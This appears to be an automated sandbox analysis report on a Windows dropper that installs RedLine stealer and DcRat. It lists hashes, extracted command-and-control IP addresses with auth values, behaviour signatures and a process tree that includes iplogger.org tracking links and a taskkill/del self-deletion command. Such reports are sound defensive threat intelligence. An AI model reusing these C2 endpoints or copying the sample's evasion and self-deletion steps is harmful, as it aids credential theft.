Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
23-08-2022 16:11
General
-
Target
45597a36ace0c0df1890299d8d82d938.exe
-
Size
2.6MB
-
MD5
45597a36ace0c0df1890299d8d82d938
-
SHA1
285a4ee677b9f7675a0fffe9813488fcdeff7948
-
SHA256
dd0145067f81bf5aff9a7ee7eb56c11a98a5f69a9bdbc36744919ee49890de5a
-
SHA512
107284b6acebe67386177a2251099d98715a3d1f5e565eaf9dd490a4235f80108475983122199e85533df1f15b1ba330c80969e26bc5fcf8072fcf42ff6edcc3
-
SSDEEP
49152:pAI+cNpJc7YrEa2u2h9swu+AU3Z9CcVL2wD+aRpXPaAt1DD4S6sdsWjIa:pAI+Oc8rHJ2jHxZYOTDrRxaAt1DES6o/
Malware Config
Extracted
redline
5076357887
195.54.170.157:16525
-
auth_value
0dfaff60271d374d0c206d19883e06f3
Extracted
redline
5
176.113.115.146:9582
-
auth_value
d38b30c1ccd6c1e5088d9e5bd9e51b0f
Extracted
redline
nam3
103.89.90.61:34589
-
auth_value
64b900120bbceaa6a9c60e9079492895
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 9 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 17 IoCs
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 9 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 12 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 5 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\45597a36ace0c0df1890299d8d82d938.exe"C:\Users\Admin\AppData\Local\Temp\45597a36ace0c0df1890299d8d82d938.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1ARmX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff3a4046f8,0x7fff3a404708,0x7fff3a4047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,17882193465015586610,9223763694032311636,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,17882193465015586610,9223763694032311636,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AAmX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff3a4046f8,0x7fff3a404708,0x7fff3a4047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,18425969266562091997,13581423393682655782,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,18425969266562091997,13581423393682655782,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AFmX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3a4046f8,0x7fff3a404708,0x7fff3a4047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,17827222595410475505,4759277987448515783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AGmX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3a4046f8,0x7fff3a404708,0x7fff3a4047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,16373597107223477641,15198143354515138180,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1384 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AJmX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7fff3a4046f8,0x7fff3a404708,0x7fff3a4047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,14544202112780849348,15318095457320100478,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AKmX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3a4046f8,0x7fff3a404708,0x7fff3a4047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,13084321579550757460,3423874986861211102,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,13084321579550757460,3423874986861211102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AZmX42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3a4046f8,0x7fff3a404708,0x7fff3a4047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,2171998297874440901,11002008073167300930,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AVmX42⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3a4046f8,0x7fff3a404708,0x7fff3a4047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6796 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5704 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7612 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff69d705460,0x7ff69d705470,0x7ff69d7054804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7612 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8156 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2020 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1252 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,2505936727405504413,17883209424188980805,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7144 /prefetch:83⤵
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exe"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 7683⤵
- Program crash
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\real.exe"C:\Program Files (x86)\Company\NewProduct\real.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im real.exe /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exe"C:\Program Files (x86)\Company\NewProduct\jshainx.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\brokerius.exe"C:\Program Files (x86)\Company\NewProduct\brokerius.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
